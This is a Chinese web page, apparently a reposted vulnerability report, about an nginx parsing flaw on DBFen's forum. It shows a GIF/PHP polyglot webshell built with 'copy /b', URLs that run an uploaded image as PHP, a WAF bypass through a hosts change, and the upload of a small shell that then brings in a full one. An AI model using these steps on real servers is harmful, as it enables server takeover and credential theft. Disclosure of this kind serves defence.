网站地图    收藏   

主页 > 后端 > 网站安全 >

多备份(DBFen)某分站nginx解析漏洞(可getshell) - 网站

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 因是论坛故存在上传 通过头像上传处抓包二次渲染前的加入php phpinfo();?原图 http: bbs dbfen com data attachment forum 201401 20 124804tkv7xu06npxs839v gif php通过phpinfo获取服务器真实IP 改host绕...

因是论坛故存在上传.
 
通过头像上传处抓包二次渲染前的加入<php phpinfo();?>原图.
 
http://bbs.dbfen.com/data/attachment/forum/201401/20/124804tkv7xu06npxs839v.gif/.php
 
通过phpinfo获取服务器真实IP.
 
改host绕过加速乐可上传并使用一句话.
 
论坛沦陷.
 
图片木马合成
E:\>copy 1.gif /b+ qiangda.php /b c.gif

1.gif

qiangda.php

 

 
已复制         1 个文件。
 
 
传小马
 
http://bbs.dbfen.com/data/attachment/forum/201401/20/142927ubc80udjqrjbuoqm.gif/.php?id=cshell
 
小马传大马
 
http://bbs.dbfen.com/data/attachment/forum/201401/20/zip.php
 
通过论坛可查管理员密码, 主站岌岌可危.
 
 
 
但我都只是说说, 什么都没做. 真的. ;)
 
 
 
希望做云端的厂商更是一定要提高安全意识. 
 
 

修复方案:
升级

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论